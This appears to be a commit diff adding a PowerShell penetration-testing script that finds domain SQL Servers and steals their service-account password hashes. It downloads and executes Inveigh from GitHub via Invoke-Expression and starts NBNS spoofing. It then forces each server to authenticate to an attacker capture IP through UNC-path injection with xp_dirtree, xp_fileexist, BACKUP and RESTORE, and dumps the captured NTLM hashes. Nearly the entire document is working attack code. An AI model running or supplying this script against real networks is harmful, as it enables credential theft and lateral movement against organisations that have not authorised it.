|
| 1 | +# author: scott sutherland (@_nullbind), NetSPI 2016 |
| 2 | +# script name: Get-SQLServiceAccountPwHash.ps1 |
| 3 | +# requirements: PowerUpSQL and Inveigh |
| 4 | +# description: locate domain sql servers, attempt login, unc path inject to capture password hash of associated service account. |
| 5 | +# example: Get-SQLServiceAccountPwHashes -Verbose -CaptureIp 10.1.1.12 |
| 6 | +# Note: alt domain user: runas /noprofile /netonly /user:domain\users powershell.exe |
| 7 | + |
| 8 | +Function Get-SQLServiceAccountPwHashes { |
| 9 | + |
| 10 | + [CmdletBinding()] |
| 11 | + Param( |
| 12 | + [Parameter(Mandatory=$false)] |
| 13 | + [string]$Username, |
| 14 | + |
| 15 | + [Parameter(Mandatory=$false)] |
| 16 | + [string]$Password, |
| 17 | + |
| 18 | + [Parameter(Mandatory=$false)] |
| 19 | + [string]$DomainController, |
| 20 | + |
| 21 | + [Parameter(Mandatory=$true)] |
| 22 | + [string]$CaptureIp, |
| 23 | + |
| 24 | + [Parameter(Mandatory=$false)] |
| 25 | + [int]$TimeOut = 5 |
| 26 | + ) |
| 27 | + |
| 28 | + Begin |
| 29 | + { |
| 30 | + # Attempt to load Inveigh via reflection |
| 31 | + Invoke-Expression -Command (New-Object -TypeName system.net.webclient).downloadstring('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1') |
| 32 | + |
| 33 | + $TestIt = Test-Path -Path Function:\Invoke-Inveigh |
| 34 | + if($TestIt -eq 'True') |
| 35 | + { |
| 36 | + Write-Verbose -Message "Inveigh loaded." |
| 37 | + }else{ |
| 38 | + Write-Verbose -Message "Inveigh NOT loaded." |
| 39 | + return |
| 40 | + } |
| 41 | + } |
| 42 | + |
| 43 | + Process |
| 44 | + { |
| 45 | + # Discover SQL Servers on the Domain via LDAP queries for SPN records |
| 46 | + Write-Verbose "Testings access to domain sql servers..." |
| 47 | + $SQLServerInstances = Get-SQLInstanceDomain -verbose -CheckMgmt -DomainController $DomainController -Username $Username -Password $Password | Get-SQLConnectionTestThreaded -Verbose -Threads 15 |
| 48 | + $SQLServerInstancesCount = $SQLServerInstances.count |
| 49 | + Write-output "$SQLServerInstancesCount SQL Server instances found" |
| 50 | + |
| 51 | + # Get list of SQL Servers that the provided account can log into |
| 52 | + $AccessibleSQLServers = $SQLServerInstances | ? {$_.status -eq "Accessible"} |
| 53 | + $AccessibleSQLServersCount = $AccessibleSQLServers.count |
| 54 | + |
| 55 | + # Status user |
| 56 | + Write-output "$AccessibleSQLServersCount SQL Server instances can be logged into" |
| 57 | + Write-output "Attacking $AccessibleSQLServersCount accessible SQL Server instances..." |
| 58 | + |
| 59 | + # Start sniffing |
| 60 | + Invoke-Inveigh -NBNS Y -MachineAccounts Y -WarningAction SilentlyContinue | Out-Null |
| 61 | + |
| 62 | + # Perform unc path injection on each one |
| 63 | + $AccessibleSQLServers | |
| 64 | + ForEach-Object{ |
| 65 | + |
| 66 | + # Get current instance |
| 67 | + $CurrentInstance = $_.Instance |
| 68 | + |
| 69 | + # Start unc path injection for each interface |
| 70 | + Write-Output "$CurrentInstance - Injecting UNC path to \\$CaptureIp\file" |
| 71 | + |
| 72 | + # Functions executable by the Public role that accept UNC paths |
| 73 | + Get-SQLQuery -Instance $CurrentInstance -Query "xp_dirtree '\\$CaptureIp\file'" -SuppressVerbose | out-null |
| 74 | + Get-SQLQuery -Instance $CurrentInstance -Query "xp_fileexist '\\$CaptureIp\file'" -SuppressVerbose | out-null |
| 75 | + Get-SQLQuery -Instance $CurrentInstance -Query "BACKUP DATABASE TESTING TO DISK = '\\$CaptureIp\file'" -SuppressVerbose | out-null |
| 76 | + Get-SQLQuery -Instance $CurrentInstance -Query "RESTORE VERIFYONLY FROM DISK = '\\$CaptureIp\file'" -SuppressVerbose | out-null |
| 77 | + |
| 78 | + # Sleep to give the SQL Server time to send us hashes :) |
| 79 | + sleep $TimeOut |
| 80 | + |
| 81 | + # Get hashes |
| 82 | + Write-Verbose "Captured password hashes:" |
| 83 | + Get-InveighCleartext | Sort-Object |
| 84 | + Get-InveighNTLMv1 | Sort-Object |
| 85 | + Get-InveighNTLMv2 | Sort-Object |
| 86 | + } |
| 87 | + } |
| 88 | + |
| 89 | + End |
| 90 | + { |
| 91 | + # Return results |
| 92 | + Write-Output "---------------------------------------" |
| 93 | + Write-Output "Final List of Captured password hashes:" |
| 94 | + Write-Output "---------------------------------------" |
| 95 | + Get-InveighCleartext | Sort-Object |
| 96 | + Get-InveighNTLMv1 | Sort-Object |
| 97 | + Get-InveighNTLMv2 | Sort-Object |
| 98 | + |
| 99 | + # Stop sniffing |
| 100 | + Stop-Inveigh | Out-Null |
| 101 | + |
| 102 | + # Clear cache |
| 103 | + Clear-Inveigh | Out-Null |
| 104 | + } |
| 105 | +} |
| 106 | + |
0 commit comments